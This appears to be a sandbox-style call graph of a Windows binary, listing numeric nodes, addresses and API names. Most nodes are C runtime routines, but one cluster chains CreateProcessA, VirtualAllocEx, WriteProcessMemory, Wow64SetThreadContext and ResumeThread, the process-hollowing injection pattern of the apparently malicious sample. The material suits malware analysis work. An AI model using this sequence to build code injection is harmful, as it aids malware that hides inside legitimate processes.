_Fputc 21706->21707 21708 fa344d 21707->21708 21709 fa3442 21707->21709 21711 fa33bd ___scrt_uninitialize_crt 68 API calls 21708->21711 21710 fa3318 ___scrt_uninitialize_crt 72 API calls 21709->21710 21712 fa3448 21710->21712 21713 fa3457 21711->21713 21714 fa06a0 _Fputc 43 API calls 21712->21714 21713->21712 21716 faaae9 _Ungetc 43 API calls 21713->21716 21715 fa3485 21714->21715 21715->21697 21717 fa346e 21716->21717 21722 fabd19 21717->21722 21763 f9f66c LeaveCriticalSection 21719->21763 21721 fa31ee 21721->21688 21723 fabd2a 21722->21723 21724 fabd37 21722->21724 21725 fa2f1d __strnicoll 14 API calls 21723->21725 21726 fabd80 21724->21726 21729 fabd5e 21724->21729 21731 fabd2f 21725->21731 21727 fa2f1d __strnicoll 14 API calls 21726->21727 21728 fabd85 21727->21728 21730 fa2e1f __strnicoll 43 API calls 21728->21730 21733 fabc77 21729->21733 21730->21731 21731->21712 21734 fabc83 ___scrt_is_nonwritable_in_current_image 21733->21734 21746 fb09c6 EnterCriticalSection 21734->21746 21736 fabc92 21737 fabcd7 21736->21737 21747 fb0a9d 21736->21747 21739 fa2f1d __strnicoll 14 API calls 21737->21739 21740 fabcde 21739->21740 21760 fabd0d 21740->21760 21741 fabcbe FlushFileBuffers 21741->21740 21742 fabcca GetLastError 21741->21742 21744 fa2f0a __dosmaperr 14 API calls 21742->21744 21744->21737 21746->21736 21748 fb0aaa 21747->21748 21749 fb0abf 21747->21749 21750 fa2f0a __dosmaperr 14 API calls 21748->21750 21751 fa2f0a __dosmaperr 14 API calls 21749->21751 21755 fb0ae4 21749->21755 21752 fb0aaf 21750->21752 21753 fb0aef 21751->21753 21754 fa2f1d __strnicoll 14 API calls 21752->21754 21756 fa2f1d __strnicoll 14 API calls 21753->21756 21757 fb0ab7 21754->21757 21755->21741 21758 fb0af7 21756->21758 21757->21741 21759 fa2e1f __strnicoll 43 API calls 21758->21759 21759->21757 21761 fb09e9 ___scrt_uninitialize_crt LeaveCriticalSection 21760->21761 21762 fabcf6 21761->21762 21762->21731 21763->21721 21764->21704 19458 287018d 19461 28701c5 19458->19461 19459 28702d3 CreateProcessA VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 19460 28703a2 WriteProcessMemory 19459->19460 19459->19461 19462 28703e7 19460->19462 19461->19459 19463 2870392 TerminateProcess 19461->19463 19464 28703ec WriteProcessMemory 19462->19464 19465 2870429 WriteProcessMemory Wow64SetThreadContext ResumeThread 19462->19465 19463->19459 19464->19462 24017 f9f5c6 24018 fa348b ___scrt_uninitialize_crt 72 API calls 24017->24018 24019 f9f5ce 24018->24019 24027 fa920c 24019->24027 24021 f9f5d3 24037 fa92b7 24021->24037 24024 f9f5fd 24025 fa899f ___free_lconv_mon 14 API calls 24024->24025 24026 f9f608 24025->24026 24028 fa9218 ___scrt_is_nonwritable_in_current_image 24027->24028 24041 fa2f71 EnterCriticalSection 24028->24041 24030 fa928f 24048 fa92ae 24030->24048 24032 fa9223 24032->24030 24034 fa9263 DeleteCriticalSection 24032->24034 24042 fa3150 24032->24042 24036 fa899f ___free_lconv_mon 14 API calls 24034->24036 24036->24032 24038 fa92ce 24037->24038 24039 f9f5e2 DeleteCriticalSection 24037->24039 24038->24039 24040 fa899f ___free_lconv_mon 14 API calls 24038->24040 24039->24021 24039->24024 24040->24039 24041->24032 24043 fa3163 _Fputc 24042->24043 24051 fa302b 24043->24051 24045 fa316f 24046 fa06a0 _Fputc 43 API calls 24045->24046 24047 fa317b 24046->24047 24047->24032 24123 fa2fb9 LeaveCriticalSection 24048->24123 24050 fa929b 24050->24021 24052 fa3037 ___scrt_is_nonwritable_in_current_image 24051->24052 24053 fa3041 24052->24053 24054 fa3064 24052->24054 24055 fa2da2 _Fputc 43 API calls 24053->24055 24056 fa305c 24054->24056 24062 f9f658 EnterCriticalSection 24054->24062 24055->24056 24056->24045 24058 fa3082 24063 fa30c2 24058->24063 24060 fa308f 24077 fa30ba 24060->24077 24062->24058 24064 fa30cf 24063->24064 24065 fa30f2 24063->24065 24066 fa2da2 _Fputc 43 API calls 24064->24066 24067 fa33bd ___scrt_uninitialize_crt 68 API calls 24065->24067 24075 fa30ea 24065->24075 24066->24075 24068 fa310a 24067->24068 24069 fa92b7 14 API calls 24068->24069 24070 fa3112 24069->24070 24071 faaae9 _Ungetc 43 API calls 24070->24071 24072 fa311e 24071->24072 24080 fabaf9 24072->24080 24075->24060 24076 fa899f ___free_lconv_mon 14 API calls 24076->24075 24122 f9f66c LeaveCriticalSection 24077->24122 24079 fa30c0 24079->24056 24081 fabb22 24080->24081 24082 fa3125 24080->24082 24083 fabb71 24081->24083 24085 fabb49 24081->24085 24082->24075 24082->24076 24084 fa2da2 _Fputc 43 API calls 24083->24084 24084->24082 24087 faba68 24085->24087 24088 faba74 ___scrt_is_nonwritable_in_current_image 24087->24088 24095 fb09c6 EnterCriticalSection 24088->24095 24090 faba82 24091 fabab3 24090->24091 24096 fabb9c 24090->24096 24109 fabaed 24091->24109 24095->24090 24097 fb0a9d __fread_nolock 43 API calls 24096->24097 24099 fabbac 24097->24099 24098 fabbb2 24112 fb0a0c 24098->24112 24099->24098 24101 fabbe4 24099->24101 24103 fb0a9d __fread_nolock 43 API calls 24099->24103 24101->24098 24102 fb0a9d __fread_nolock 43 API calls 24101->24102 24104 fabbf0 CloseHandle 24102->24104 24105 fabbdb 24103->24105 24104->24098 24106 fabbfc GetLastError 24104->24106 24107 fb0a9d __fread_nolock 43 API calls 24105->24107 24106->24098 24107->24101 24108 fabc0a __fread_nolock 24108->24091 24121 fb09e9 LeaveCriticalSection 24109->24121 24111 fabad6 24111->24082 24113 fb0a1b 24112->24113 24114 fb0a82 24112->24114 24113->24114 24119 fb0a45 24113->24119 24115 fa2f1d __strnicoll 14 API calls 24114->24115 24116 fb0a87 24115->24116 24117 fa2f0a __dosmaperr 14 API calls 24116->24117 24118 fb0a72 24117->24118 24118->24108 24119->24118 24120 fb0a6c SetStdHandle 24119->24120 24120->24118 24121->24111 24122->24079 24123->24050 19466 fb9b20 19479 f97630 19466->19479 19468 fb9b60 19495 f9afd6 19468->19495 19477 fb9bdc messages 19548 f9afc3 19477->19548 19478 fb9c37 19480 f97640 19479->19480 19481 f97663 19479->19481 19482 f9767a 19480->19482 19483 f97647 19480->19483 19484 f97674 19481->19484 19487 f9afd6 codecvt 3 API calls 19481->19487 19555 f91370 19482->19555 19486 f9afd6 codecvt 3 API calls 19483->19486 19484->19468 19488 f9764d 19486->19488 19489 f9766d 19487->19489 19491 f97656 19488->19491 19561 fa2e2f 19488->19561 19489->19468 19491->19468 19496 f9afdb _Yarn 19495->19496 19497 f9aff5 19496->19497 19498 fa82c4 codecvt 2 API calls 19496->19498 19499 f9aff7 codecvt 19496->19499 19502 fb96b0 19497->19502 19498->19496 19500 f9bc00 Concurrency::cancel_current_task RaiseException 19499->19500 19501 f9bb23 19500->19501 19503 fb98f9 19502->19503 19508 fb96da messages 19502->19508 19504 f9afc3 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 19503->19504 19505 fb990a VirtualAlloc GetUpdateRgn 19504->19505 19512 fb9960 19505->19512 19506 fa2ac1 46 API calls 19506->19508 19508->19503 19508->19506 19509 fb9910 19508->19509 19845 f96200 19508->19845 19510 fa2e2f std::_Throw_Cpp_error 43 API calls 19509->19510 19511 fb9915 19510->19511 19513 f9afd6 codecvt 3 API calls 19512->19513 19514 fb9979 19513->19514 19516 fb99f3 19514->19516 19876 f97410 19514->19876 19902 fb9000 19516->19902 19518 fb9ab9 messages 19520 fb9b11 19518->19520 19521 fb9aea messages 19518->19521 19519 f9afc3 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 19522 fb9b03 19519->19522 19523 fa2e2f std::_Throw_Cpp_error 43 API calls 19520->19523 19521->19519 19525 fb9190 19522->19525 19524 fb9b16 19523->19524 19526 f9afd6 codecvt 3 API calls 19525->19526 19530 fb91bb 19526->19530 19541 fb927e messages 19530->19541 20134 f95030 19530->20134 20142 f94e90 19530->20142 20181 f96e90 19530->20181 20188 f94a80 19530->20188 19532 fb9315 OffsetRect 19532->19541 19533 f94e90 76 API calls 19533->19541 19534 f96e90 49 API calls 19534->19541 19535 f94a80 49 API calls 19535->19541 19536 fa2ac1 46 API calls 19536->19541 19537 f92300 76 API calls 19537->19541 19540 f92460 76 API calls 19540->19541 19541->19532 19541->19533 19541->19534 19541->19535 19541->19536 19541->19537 19541->19540 19542 fb969c 19541->19542 19545 fb9667 messages 19541->19545 20196 f96490 19541->20196 20223 f96d20 19541->20223 19543 fa2e2f std::_Throw_Cpp_error 43 API calls 19542->19543 19544 fb96a1 19543->19544 19546 f9afc3 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 19545->19546 19547 fb9698 19546->19547 19547->19477 19549 f9afcb 19548->19549 19550 f9afcc IsProcessorFeaturePresent 19548->19550 19549->19478 19552 f9b942 19550->19552 20661 f9b905 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 19552->20661 19554 f9ba25 19554->19478 19556 f9137b codecvt 19555->19556 19566 f9bc00 19556->19566 19558 f9138a 19569 f9bb5b 19558->19569 19562 fa2d6b __strnicoll 43 API calls 19561->19562 19563 fa2e3e 19562->19563 19564 fa2e4c __Getctype 11 API calls 19563->19564 19565 fa2e4b 19564->19565 19567 f9bc1a 19566->19567 19568 f9bc47 RaiseException 19566->19568 19567->19568 19568->19558 19570 f9bb68 _Yarn 19569->19570 19574 f913b1 19569->19574 19571 f9bb95 19570->19571 19570->19574 19575 fa882b 19570->19575 19584 fa21bf 19571->19584 19574->19488 19576 fa8847 19575->19576 19577 fa8839 19575->19577 19587 fa2f1d 19576->19587 19577->19576 19582 fa885f 19577->19582 19579 fa884f 19590 fa2e1f 19579->19590 19580 fa8859 19580->19571 19582->19580 19583 fa2f1d __strnicoll 14 API calls 19582->19583 19583->19579 19585 fa899f ___free_lconv_mon 14 API calls 19584->19585 19586 fa21d7 19585->19586 19586->19574 19593 fa9978 GetLastError 19587->19593 19589 fa2f22 19589->19579 19730 fa2d6b 19590->19730 19594 fa9994 19593->19594 19595 fa998e 19593->19595 19599 fa9998 SetLastError 19594->19599 19621 fa8f0a 19594->19621 19616 fa8ecb 19595->19616 19599->19589 19603 fa99de 19606 fa8f0a __Getctype 6 API calls 19603->19606 19604 fa99cd 19605 fa8f0a __Getctype 6 API calls 19604->19605 19607 fa99db 19605->19607 19608 fa99ea 19606->19608 19635 fa899f 19607->19635 19609 fa99ee 19608->19609 19610 fa9a05 19608->19610 19612 fa8f0a __Getctype 6 API calls 19609->19612 19641 fa9655 19610->19641 19612->19607 19615 fa899f ___free_lconv_mon 12 API calls 19615->19599 19646 fa8c7a 19616->19646 19619 fa8f02 TlsGetValue 19620 fa8ef0 19620->19594 19622 fa8c7a std::_Locinfo::_Locinfo_ctor 5 API calls 19621->19622 19623 fa8f26 19622->19623 19624 fa8f2f 19623->19624 19625 fa8f44 TlsSetValue 19623->19625 19624->19599 19626 fa8942 19624->19626 19627 fa894f 19626->19627 19628 fa898f 19627->19628 19629 fa897a HeapAlloc 19627->19629 19632 fa8963 __Getctype 19627->19632 19631 fa2f1d __strnicoll 13 API calls 19628->19631 19630 fa898d 19629->19630 19629->19632 19633 fa8994 19630->19633 19631->19633 19632->19628 19632->19629 19661 fa82c4 19632->19661 19633->19603 19633->19604 19636 fa89aa HeapFree 19635->19636 19637 fa89d4 19635->19637 19636->19637 19638 fa89bf GetLastError 19636->19638 19637->19599 19639 fa89cc __dosmaperr 19638->19639 19640 fa2f1d __strnicoll 12 API calls 19639->19640 19640->19637 19674 fa94e9 19641->19674 19647 fa8ca8 19646->19647 19650 fa8ca4 19646->19650 19647->19650 19653 fa8baf 19647->19653 19650->19619 19650->19620 19651 fa8cc2 GetProcAddress 19651->19650 19652 fa8cd2 std::_Locinfo::_Locinfo_ctor 19651->19652 19652->19650 19659 fa8bc0 ___vcrt_FlsFree 19653->19659 19654 fa8c56 19654->19650 19654->19651 19655 fa8bde LoadLibraryExW 19656 fa8bf9 GetLastError 19655->19656 19657 fa8c5d 19655->19657 19656->19659 19657->19654 19658 fa8c6f FreeLibrary 19657->19658 19658->19654 19659->19654 19659->19655 19660 fa8c2c LoadLibraryExW 19659->19660 19660->19657 19660->19659 19664 fa82f1 19661->19664 19665 fa82fd ___scrt_is_nonwritable_in_current_image 19664->19665 19670 fa2f71 EnterCriticalSection 19665->19670 19667 fa8308 19671 fa8344 19667->19671 19670->19667 19672 fa2fb9 std::_Lockit::~_Lockit LeaveCriticalSection 19671->19672 19673 fa82cf 19672->19673 19673->19632 19675 fa94f5 ___scrt_is_nonwritable_in_current_image 19674->19675 19688 fa2f71 EnterCriticalSection 19675->19688 19677 fa94ff 19689 fa952f 19677->19689 19680 fa95fb 19681 fa9607 ___scrt_is_nonwritable_in_current_image 19680->19681 19693 fa2f71 EnterCriticalSection 19681->19693 19683 fa9611 19694 fa97dc 19683->19694 19685 fa9629 19698 fa9649 19685->19698 19688->19677 19692 fa2fb9 LeaveCriticalSection 19689->19692 19691 fa951d 19691->19680 19692->19691 19693->19683 19695 fa97eb __Getctype 19694->19695 19696 fa9812 __Getctype 19694->19696 19695->19696 19701 fb1867 19695->19701 19696->19685 19729 fa2fb9 LeaveCriticalSection 19698->19729 19700 fa9637 19700->19615 19702 fb18e7 19701->19702 19705 fb187d 19701->19705 19703 fb1935 19702->19703 19706 fa899f ___free_lconv_mon 14 API calls 19702->19706 19704 fb19d8 __Getctype 14 API calls 19703->19704 19725 fb1943 19704->19725 19705->19702 19707 fb18b0 19705->19707 19712 fa899f ___free_lconv_mon 14 API calls 19705->19712 19708 fb1909 19706->19708 19709 fb18d2 19707->19709 19717 fa899f ___free_lconv_mon 14 API calls 19707->19717 19710 fa899f ___free_lconv_mon 14 API calls 19708->19710 19711 fa899f ___free_lconv_mon 14 API calls 19709->19711 19713 fb191c 19710->19713 19714 fb18dc 19711->19714 19716 fb18a5 19712->19716 19718 fa899f ___free_lconv_mon 14 API calls 19713->19718 19719 fa899f ___free_lconv_mon 14 API calls 19714->19719 19715 fb19a3 19720 fa899f ___free_lconv_mon 14 API calls 19715->19720 19721 fb0b1d ___free_lconv_mon 14 API calls 19716->19721 19722 fb18c7 19717->19722 19723 fb192a 19718->19723 19719->19702 19724 fb19a9 19720->19724 19721->19707 19726 fb0fd1 __Getctype 14 API calls 19722->19726 19727 fa899f ___free_lconv_mon 14 API calls 19723->19727 19724->19696 19725->19715 19728 fa899f 14 API calls ___free_lconv_mon 19725->19728 19726->19709 19727->19703 19728->19725 19729->19700 19731 fa2d7d _Fputc 19730->19731 19736 fa2da2 19731->19736 19733 fa2d95 19747 fa06a0 19733->19747 19737 fa2db9 19736->19737 19738 fa2db2 19736->19738 19743 fa2dc7 19737->19743 19757 fa2bfa 19737->19757 19753 fa08f0 GetLastError 19738->19753 19741 fa2dee 19741->19743 19760 fa2e4c IsProcessorFeaturePresent 19741->19760 19743->19733 19744 fa2e1e 19745 fa2d6b __strnicoll 43 API calls 19744->19745 19746 fa2e2b 19745->19746 19746->19733 19748 fa06ac 19747->19748 19749 fa06c3 19748->19749 19792 fa0940 19748->19792 19751 fa06d6 19749->19751 19752 fa0940 _Fputc 43 API calls 19749->19752 19751->19580 19752->19751 19754 fa0909 19753->19754 19764 fa9a29 19754->19764 19758 fa2c1e 19757->19758 19759 fa2c05 GetLastError SetLastError 19757->19759 19758->19741 19759->19741 19761 fa2e58 19760->19761 19786 fa2c23 19761->19786 19765 fa9a3c 19764->19765 19769 fa9a42 19764->19769 19766 fa8ecb __Getctype 6 API calls 19765->19766 19766->19769 19767 fa8f0a __Getctype 6 API calls 19768 fa9a5c 19767->19768 19770 fa8942 __Getctype 14 API calls 19768->19770 19785 fa0925 SetLastError 19768->19785 19769->19767 19769->19785 19771 fa9a6c 19770->19771 19772 fa9a89 19771->19772 19773 fa9a74 19771->19773 19774 fa8f0a __Getctype 6 API calls 19772->19774 19775 fa8f0a __Getctype 6 API calls 19773->19775 19776 fa9a95 19774->19776 19777 fa9a80 19775->19777 19778 fa9aa8 19776->19778 19779 fa9a99 19776->19779 19782 fa899f ___free_lconv_mon 14 API calls 19777->19782 19781 fa9655 __Getctype 14 API calls 19778->19781 19780 fa8f0a __Getctype 6 API calls 19779->19780 19780->19777 19783 fa9ab3 19781->19783 19782->19785 19784 fa899f ___free_lconv_mon 14 API calls 19783->19784 19784->19785 19785->19737 19787 fa2c3f _unexpected codecvt 19786->19787 19788 fa2c6b IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 19787->19788 19789 fa2d3c _unexpected 19788->19789 19790 f9afc3 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 19789->19790 19791 fa2d5a GetCurrentProcess TerminateProcess 19790->19791 19791->19744 19793 fa094e GetLastError 19792->19793 19794 fa098f 19792->19794 19795 fa095d 19793->19795 19794->19749 19796 fa9a29 _Fputc 14 API calls 19795->19796 19797 fa097a SetLastError 19796->19797 19797->19794 19798 fa0996 19797->19798 19801 fa2fe7 19798->19801 19812 fab830 19801->19812 19805 fa3020 19842 fa6a9f 19805->19842 19806 fa3001 IsProcessorFeaturePresent 19809 fa300d 19806->19809 19808 fa2ff7 19808->19805 19808->19806 19810 fa2c23 _unexpected 8 API calls 19809->19810 19810->19805 19813 fab762 _unexpected EnterCriticalSection LeaveCriticalSection 19812->19813 19814 fa2fec 19813->19814 19814->19808 19815 fab875 19814->19815 19816 fab881 ___scrt_is_nonwritable_in_current_image 19815->19816 19817 fa9978 __strnicoll 14 API calls 19816->19817 19821 fab8ae _unexpected 19816->19821 19824 fab8a8 _unexpected 19816->19824 19817->19824 19818 fab8f5 19820 fa2f1d __strnicoll 14 API calls 19818->19820 19819 fab8df 19819->19808 19822 fab8fa 19820->19822 19823 fab921 19821->19823 19826 fa2f71 std::_Lockit::_Lockit EnterCriticalSection 19821->19826 19825 fa2e1f __strnicoll 43 API calls 19822->19825 19828 fab963 19823->19828 19829 faba54 19823->19829 19840 fab992 19823->19840 19824->19818 19824->19819 19824->19821 19825->19819 19826->19823 19827 faba01 _unexpected LeaveCriticalSection 19830 fab9d8 19827->19830 19836 fa9827 __Getctype 43 API calls 19828->19836 19828->19840 19831 faba5f 19829->19831 19832 fa2fb9 std::_Lockit::~_Lockit LeaveCriticalSection 19829->19832 19830->19819 19835 fab9e7 19830->19835 19837 fa9827 __Getctype 43 API calls 19830->19837 19833 fa6a9f _unexpected 23 API calls 19831->19833 19832->19831 19834 faba67 19833->19834 19835->19819 19841 fa9827 __Getctype 43 API calls 19835->19841 19838 fab987 19836->19838 19837->19835 19839 fa9827 __Getctype 43 API calls 19838->19839 19839->19840 19840->19827 19841->19819 19843 fa68c3 _unexpected 23 API calls 19842->19843 19844 fa302a 19843->19844 19846 f9621a 19845->19846 19847 f96316 19845->19847 19850 f96283 19846->19850 19851 f96276 19846->19851 19854 f9622d 19846->19854 19860 f913f0 19847->19860 19849 f9631b 19852 f91370 std::_Throw_Cpp_error 44 API calls 19849->19852 19856 f9afd6 codecvt 3 API calls 19850->19856 19858 f9623d _Yarn 19850->19858 19851->19849 19851->19854 19852->19858 19853 f9afd6 codecvt 3 API calls 19853->19858 19854->19853 19855 fa2e2f std::_Throw_Cpp_error 43 API calls 19857 f96325 19855->19857 19856->19858 19858->19855 19859 f962dc _Yarn messages 19858->19859 19859->19508 19865 f97b42 19860->19865 19870 f97a65 19865->19870 19868 f9bc00 Concurrency::cancel_current_task RaiseException 19869 f97b61 19868->19869 19873 f91280 19870->19873 19874 f9bb5b ___std_exception_copy 43 API calls 19873->19874 19875 f912ae 19874->19875 19875->19868 19877 f975a6 19876->19877 19879 f9745d 19876->19879 19913 f97000 19877->19913 19882 f9afd6 codecvt 3 API calls 19879->19882 19880 fa2e2f std::_Throw_Cpp_error 43 API calls 19881 f975b0 19880->19881 19947 f94c10 19881->19947 19887 f974b7 _Yarn 19882->19887 19884 f975bb 19885 f9bc00 Concurrency::cancel_current_task RaiseException 19884->19885 19886 f975c4 19885->19886 19888 f97623 19886->19888 19889 f975e9 19886->19889 19893 f9760c 19886->19893 19887->19880 19895 f9756b messages 19887->19895 19890 f91370 std::_Throw_Cpp_error 44 API calls 19888->19890 19889->19888 19891 f975f0 19889->19891 19894 f975f6 19890->19894 19896 f9afd6 codecvt 3 API calls 19891->19896 19892 f9761d 19892->19514 19893->19892 19897 f9afd6 codecvt 3 API calls 19893->19897 19898 fa2e2f std::_Throw_Cpp_error 43 API calls 19894->19898 19901 f975ff 19894->19901 19895->19514 19896->19894 19899 f97616 19897->19899 19900 f9762d 19898->19900 19899->19514 19901->19514 19903 fb9147 19902->19903 19910 fb901f 19902->19910 19904 fb9170 messages 19903->19904 19906 fa2e2f std::_Throw_Cpp_error 43 API calls 19903->19906 19904->19518 19905 f95030 49 API calls 19905->19910 19907 fb9188 19906->19907 19908 f96e90 49 API calls 19908->19910 19909 f94e90 76 API calls 19909->19910 19910->19903 19910->19905 19910->19908 19910->19909 19911 f94a80 49 API calls 19910->19911 19952 fa2ac1 19910->19952 19911->19910 19914 f97b42 std::_Throw_Cpp_error 44 API calls 19913->19914 19917 f9700a 19914->19917 19915 f971a6 19916 f97000 44 API calls 19915->19916 19930 f970ba _Yarn 19916->19930 19917->19915 19918 f971a1 19917->19918 19921 f970a9 19917->19921 19922 f970d6 19917->19922 19919 f91370 std::_Throw_Cpp_error 44 API calls 19918->19919 19919->19915 19920 fa2e2f std::_Throw_Cpp_error 43 API calls 19923 f971b0 19920->19923 19921->19918 19924 f970b4 19921->19924 19927 f9afd6 codecvt 3 API calls 19922->19927 19922->19930 19925 f94c10 43 API calls 19923->19925 19926 f9afd6 codecvt 3 API calls 19924->19926 19928 f971bb 19925->19928 19926->19930 19927->19930 19929 f9bc00 Concurrency::cancel_current_task RaiseException 19928->19929 19931 f971c4 19929->19931 19930->19920 19934 f9716c messages 19930->19934 19932 f97219 19931->19932 19933 f9735e 19931->19933 19936 f97233 19932->19936 19937 f97281 19932->19937 19938 f97271 19932->19938 19935 f97000 44 API calls 19933->19935 19934->19887 19939 f97363 19935->19939 19941 f9afd6 codecvt 3 API calls 19936->19941 19942 f9afd6 codecvt 3 API calls 19937->19942 19945 f97246 _Yarn 19937->19945 19938->19936 19938->19939 19940 f91370 std::_Throw_Cpp_error 44 API calls 19939->19940 19940->19945 19941->19945 19942->19945 19943 fa2e2f std::_Throw_Cpp_error 43 API calls 19944 f9736d 19943->19944 19945->19943 19946 f97315 messages 19945->19946 19946->19887 19948 f94c37 messages 19947->19948 19949 f94c27 19947->19949 19948->19884 19949->19948 19950 fa2e2f std::_Throw_Cpp_error 43 API calls 19949->19950 19951 f94c4b 19950->19951 19953 fa2ad4 _Fputc 19952->19953 19958 fa21da 19953->19958 19955 fa2aee 19956 fa06a0 _Fputc 43 API calls 19955->19956 19957 fa2afb 19956->19957 19957->19910 19972 fa1ddb 19958->19972 19960 fa2234 19966 fa2258 19960->19966 19979 fa1d80 19960->19979 19961 fa21ec 19961->19960 19962 fa2201 19961->19962 19971 fa221c std::_Locinfo::_Locinfo_ctor 19961->19971 19964 fa2da2 _Fputc 43 API calls 19962->19964 19964->19971 19967 fa227c 19966->19967 19986 fa2a2b 19966->19986 19968 fa2304 19967->19968 19993 fa1d27 19967->19993 19969 fa1d27 43 API calls 19968->19969 19969->19971 19971->19955 19973 fa1df3 19972->19973 19974 fa1de0 19972->19974 19973->19961 19975 fa2f1d __strnicoll 14 API calls 19974->19975 19976 fa1de5 19975->19976 19977 fa2e1f __strnicoll 43 API calls 19976->19977 19978 fa1df0 19977->19978 19978->19961 19980 fa0940 _Fputc 43 API calls 19979->19980 19981 fa1d90 19980->19981 19999 fa9c02 19981->19999 19987 fa2a4d 19986->19987 19988 fa2a37 19986->19988 19992 fa2a5d 19987->19992 20082 faacb3 19987->20082 20077 fa4e6d 19988->20077 19991 fa2a42 std::_Locinfo::_Locinfo_ctor 19991->19966 19992->19966 19994 fa1d38 19993->19994 19995 fa1d4c 19993->19995 19994->19995 19996 fa2f1d __strnicoll 14 API calls 19994->19996 19995->19968 19997 fa1d41 19996->19997 19998 fa2e1f __strnicoll 43 API calls 19997->19998 19998->19995 20000 fa9c19 19999->20000 20002 fa1dad 19999->20002 20000->20002 20007 fb1ab3 20000->20007 20003 fa9c60 20002->20003 20004 fa9c77 20003->20004 20006 fa1dba 20003->20006 20004->20006 20056 fb0196 20004->20056 20006->19966 20008 fb1abf ___scrt_is_nonwritable_in_current_image 20007->20008 20020 fa9827 GetLastError 20008->20020 20012 fb1ae6 20048 fb1b34 20012->20048 20017 fb1b0e 20017->20002 20018 fa2fe7 __purecall 43 API calls 20019 fb1b33 20018->20019 20021 fa983d 20020->20021 20022 fa9843 20020->20022 20024 fa8ecb __Getctype 6 API calls 20021->20024 20023 fa8f0a __Getctype 6 API calls 20022->20023 20026 fa9847 SetLastError 20022->20026 20025 fa985f 20023->20025 20024->20022 20025->20026 20028 fa8942 __Getctype 14 API calls 20025->20028 20030 fa98dc 20026->20030 20031 fa98d7 20026->20031 20029 fa9874 20028->20029 20032 fa987c 20029->20032 20033 fa988d 20029->20033 20034 fa2fe7 __purecall 41 API calls 20030->20034 20031->20017 20047 fa2f71 EnterCriticalSection 20031->20047 20035 fa8f0a __Getctype 6 API calls 20032->20035 20036 fa8f0a __Getctype 6 API calls 20033->20036 20037 fa98e1 20034->20037 20038 fa988a 20035->20038 20039 fa9899 20036->20039 20042 fa899f ___free_lconv_mon 14 API calls 20038->20042 20040 fa989d 20039->20040 20041 fa98b4 20039->20041 20044 fa8f0a __Getctype 6 API calls 20040->20044 20043 fa9655 __Getctype 14 API calls 20041->20043 20042->20026 20045 fa98bf 20043->20045 20044->20038 20046 fa899f ___free_lconv_mon 14 API calls 20045->20046 20046->20026 20047->20012 20049 fb1b42 __Getctype 20048->20049 20051 fb1af7 20048->20051 20050 fb1867 __Getctype 14 API calls 20049->20050 20049->20051 20050->20051 20052 fb1b13 20051->20052 20055 fa2fb9 LeaveCriticalSection 20052->20055 20054 fb1b0a 20054->20017 20054->20018 20055->20054 20057 fa9827 __Getctype 43 API calls 20056->20057 20058 fb019b 20057->20058 20061 fb00ae 20058->20061 20062 fb00ba ___scrt_is_nonwritable_in_current_image 20061->20062 20065 fb00d4 20062->20065 20072 fa2f71 EnterCriticalSection 20062->20072 20064 fb00db 20064->20006 20065->20064 20067 fa2fe7 __purecall 43 API calls 20065->20067 20066 fb0110 20073 fb012d 20066->20073 20069 fb014d 20067->20069 20070 fb00e4 20070->20066 20071 fa899f ___free_lconv_mon 14 API calls 20070->20071 20071->20066 20072->20070 20076 fa2fb9 LeaveCriticalSection 20073->20076 20075 fb0134 20075->20065 20076->20075 20078 fa9827 __Getctype 43 API calls 20077->20078 20079 fa4e78 20078->20079 20089 fa9bd5 20079->20089 20093 fa54e1 20082->20093 20086 f9afc3 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 20088 faad7c 20086->20088 20087 faace0 20087->20086 20088->19992 20090 fa9be8 20089->20090 20091 fa4e88 20089->20091 20090->20091 20092 fb1ab3 __Getctype 43 API calls 20090->20092 20091->19991 20092->20091 20094 fa54f8 20093->20094 20095 fa54ff 20093->20095 20094->20087 20101 faeb99 20094->20101 20095->20094 20096 fa9827 __Getctype 43 API calls 20095->20096 20097 fa5520 20096->20097 20098 fa9bd5 __Getctype 43 API calls 20097->20098 20099 fa5536 20098->20099 20116 fa9c33 20099->20116 20102 fa54e1 __strnicoll 43 API calls 20101->20102 20103 faebb9 20102->20103 20120 faf022 20103->20120 20105 faebe6 20106 faec7d 20105->20106 20107 faec75 20105->20107 20112 faec0b __alloca_probe_16 codecvt 20105->20112 20123 fa9b87 20105->20123 20108 f9afc3 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 20106->20108 20130 f9acdd 20107->20130 20111 faeca0 20108->20111 20111->20087 20112->20107 20113 faf022 __fread_nolock MultiByteToWideChar 20112->20113 20114 faec56 20113->20114 20114->20107 20115 faec61 GetStringTypeW 20114->20115 20115->20107 20117 fa9c46 20116->20117 20119 fa9c5b 20116->20119 20118 fb0196 __strnicoll 43 API calls 20117->20118 20117->20119 20118->20119 20119->20094 20121 faf033 MultiByteToWideChar 20120->20121 20121->20105 20124 fa9bc5 20123->20124 20128 fa9b95 __Getctype 20123->20128 20125 fa2f1d __strnicoll 14 API calls 20124->20125 20127 fa9bc3 20125->20127 20126 fa9bb0 RtlAllocateHeap 20126->20127 20126->20128 20127->20112 20128->20124 20128->20126 20129 fa82c4 codecvt 2 API calls 20128->20129 20129->20128 20131 f9acf8 20130->20131 20132 f9ace7 20130->20132 20131->20106 20132->20131 20133 fa21bf ___vcrt_freefls@4 14 API calls 20132->20133 20133->20131 20135 f95071 20134->20135 20230 f93230 20135->20230 20138 f950c6 20235 f92230 20138->20235 20139 f951ff 20140 f95212 20139->20140 20245 f94b80 20139->20245 20140->19530 20323 f97865 20142->20323 20145 f97865 std::_Lockit::_Lockit 7 API calls 20146 f94ebc 20145->20146 20329 f978bd 20146->20329 20147 f94f00 20148 f978bd std::_Lockit::~_Lockit 2 API calls 20147->20148 20151 f94f09 20148->20151 20149 f94f2f 20153 f94f48 20149->20153 20154 f94f33 20149->20154 